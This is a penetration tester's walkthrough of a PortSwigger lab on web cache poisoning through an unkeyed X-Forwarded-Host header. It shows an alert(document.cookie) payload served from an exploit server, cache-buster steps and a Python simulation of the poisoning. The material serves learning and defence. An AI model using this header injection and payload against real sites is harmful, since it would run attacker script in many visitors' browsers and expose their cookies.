In the name of Allah, the Most Gracious, the Most Merciful

Hi everyone, I'm Eslam Atef, a Penetration Tester. I've been passionate about cybersecurity since my university days. Today, I'd like to share this lab with you, as I discovered some really useful insights and techniques while solving it that I believe can help others. Check it out!

Let's start :)


I was learning a new vulnerability class, web cache poisoning, and I opened the lab.


The lab description indicates that the application handles a request header in an unsafe way: the header is not sanitized, and its value controls the host from which a JavaScript file is loaded.

So I opened Burp Suite, intercepted the home page GET request in Proxy, and sent it to Repeater.


Then I started with the X-Forwarded-For header and searched the response for the value I had set, but found nothing stored or reflected.


I searched Google for cache poisoning headers and found a list of them here: https://www.fastly.com/documentation/guides/full-site-delivery/caching/preventing-cache-poisoning/


I tried these headers one by one in my attack, starting with X-Forwarded-Host, and that turned out to be the vulnerable header.


But note one thing: the header value is injected as the host in the src attribute of a <script> tag that loads an external JS file from the path /resources/js/tracking.js.

So all we need is an external server of our own that serves a file at the path /resources/js/tracking.js containing this JS code:

alert(document.cookie)

PortSwigger provides an exploit server that we can use for this lab.

I set the path /resources/js/tracking.js as the file name in the exploit server,


set the body of the file to our payload, alert(document.cookie), and clicked Store.


In Burp Suite, set the vulnerable header (X-Forwarded-Host) to the exploit server's hostname, since it is the host part that ends up inside the script's src.


Because we are pentesters and not attackers, in a real or production environment we need to add a cache buster so that we don't affect the page that real users visit.

But what is a cache buster?

A cache buster is a query parameter that gives our request a different cache key, so the cache stores our poisoned response as a separate variant of the page and the root page that all users visit is left alone. We add it like this: site.com/?param=test

When the cache serves our poisoned entry, the affected page is site.com/?param=test and not site.com/, which real users visit.

So I set this parameter to test first, before touching the original URL.


Send it again until the server responds with X-Cache: hit. Note that Cache-Control: max-age=30 means the cached copy is only served for 30 seconds; after that the cache asks the origin for a fresh response, so the poisoned entry has to be re-sent once it expires.


Then visit homepagelink/?param=test in the browser to check whether it is affected: here the XSS payload executes, because the page loads the JS file from our external server.


Remove ?param=test in Burp Suite and repeat. This poisons the original page that all normal users visit, which we do only to solve this lab. Remember: "don't do that in a production environment".
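As an added example (not the lab's code and not the author's), here is a small Python model of the whole flow above: an origin that copies X-Forwarded-Host into the script src, a cache that keys only on Host and path+query (so the header is unkeyed), and a run that shows the cache buster isolating the poisoned copy from "/", the "keep re-sending until X-Cache: hit" loop and the case where a clean copy is still cached, the 30 second max-age expiry, and a hardened origin that ignores the header. The hostnames vulnerable-site.example and exploit-server.example are placeholders.

```python
"""Toy model of the unkeyed-header cache poisoning walked through above.
Constructed for illustration: 'vulnerable-site.example' stands in for the lab
host and 'exploit-server.example' for the PortSwigger exploit server."""
import time
from dataclasses import dataclass, field

MAX_AGE = 30  # seconds; mirrors the lab's Cache-Control: max-age=30
SITE = "vulnerable-site.example"

@dataclass
class Request:
    path: str                                    # "/" or "/?param=test" (cache buster)
    host: str = SITE                             # Host header: part of the cache key
    headers: dict = field(default_factory=dict)  # e.g. X-Forwarded-Host: NOT in the key

@dataclass
class Response:
    body: str
    headers: dict

def origin(req: Request, trust_forwarded_host: bool) -> Response:
    """Origin server. trust_forwarded_host=True reproduces the lab's flaw: the host
    inside <script src="//..."> is copied unsanitized from X-Forwarded-Host."""
    host = req.headers.get("X-Forwarded-Host", req.host) if trust_forwarded_host else req.host
    body = f'<script src="//{host}/resources/js/tracking.js"></script>'
    return Response(body, {"Cache-Control": f"max-age={MAX_AGE}"})

class Cache:
    """Shared cache in front of the origin, keyed on (method, Host, path+query) only."""
    def __init__(self, trust_forwarded_host: bool, clock=time.monotonic):
        self.trust_forwarded_host, self.clock = trust_forwarded_host, clock
        self.store = {}  # key -> (expires_at, Response)

    @staticmethod
    def key(req: Request) -> tuple:
        return ("GET", req.host, req.path)  # X-Forwarded-Host deliberately absent

    def get(self, req: Request) -> Response:
        k, now = self.key(req), self.clock()
        entry = self.store.get(k)
        if entry and entry[0] > now:  # fresh copy: served to everyone with this key
            return Response(entry[1].body, {**entry[1].headers, "X-Cache": "hit"})
        fresh = origin(req, self.trust_forwarded_host)
        self.store[k] = (now + MAX_AGE, fresh)
        return Response(fresh.body, {**fresh.headers, "X-Cache": "miss"})

def poison(cache: Cache, path: str, evil_host: str, attempts: int = 3) -> bool:
    """Attacker step: re-send with X-Forwarded-Host until the cache answers 'hit'
    AND that hit carries our host. False means a clean copy is still cached and
    you have to wait for its max-age to run out before trying again."""
    req = Request(path, headers={"X-Forwarded-Host": evil_host})
    for _ in range(attempts):
        resp = cache.get(req)
        if resp.headers["X-Cache"] == "hit" and evil_host in resp.body:
            return True
    return False

def script_host_seen_by_visitor(cache: Cache, path: str) -> str:
    """A normal visitor sends no X-Forwarded-Host; return the host in <script src>."""
    body = cache.get(Request(path)).body
    return body.split('src="//', 1)[1].split("/resources/js/tracking.js", 1)[0]

def demo() -> dict:
    evil, now = "exploit-server.example", [0.0]          # fake clock, no sleeping
    vuln = Cache(trust_forwarded_host=True, clock=lambda: now[0])

    # 1. Poison only the cache-buster variant: "/" stays clean for real users.
    poison(vuln, "/?param=test", evil)
    r = {"buster_poisoned": script_host_seen_by_visitor(vuln, "/?param=test") == evil,
         "root_untouched": script_host_seen_by_visitor(vuln, "/") == SITE}

    # 2. Drop the buster. The visitor above just got "/" cached clean, so the
    #    attempt sees X-Cache: hit without our host and fails ...
    r["blocked_by_clean_copy"] = not poison(vuln, "/", evil)

    # 3. ... until that entry expires; then every visitor loads the attacker's JS.
    now[0] += MAX_AGE + 1
    r["root_poisoned_after_expiry"] = (poison(vuln, "/", evil)
                                       and script_host_seen_by_visitor(vuln, "/") == evil)

    # 4. The poisoned entry itself also dies after max-age.
    now[0] += MAX_AGE + 1
    r["root_clean_after_max_age"] = script_host_seen_by_visitor(vuln, "/") == SITE

    # 5. Hardened origin ignores X-Forwarded-Host: the same attack does nothing.
    safe = Cache(trust_forwarded_host=False, clock=lambda: now[0])
    r["hardened_unaffected"] = (not poison(safe, "/", evil)
                                and script_host_seen_by_visitor(safe, "/") == SITE)
    return r

if __name__ == "__main__":
    for check, ok in demo().items():
        print(f"{check}: {'OK' if ok else 'FAIL'}")
```

Two things the model makes visible that are easy to miss in Repeater: an X-Cache: hit alone does not prove the poisoning worked (step 2 gets hits that still carry the clean host), and the fix on the origin side is simply not to derive the script host from a header the cache does not key on (step 5).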


That is all, and the lab is solved:


Now, before we close, I want to show the impact of this vulnerability: web cache poisoning via an unkeyed header leading to stored XSS:

Because the unsanitized X-Forwarded-Host value ends up in a response that the cache stores, a malicious script source is kept in the cache and served to every user who requests that page until the entry expires. If exploited successfully, an attacker can execute JavaScript in victims' browsers, steal sensitive data such as cookies, or perform actions on behalf of the victim.

Happy Hacking …

Feel free to contact me: My LinkedIn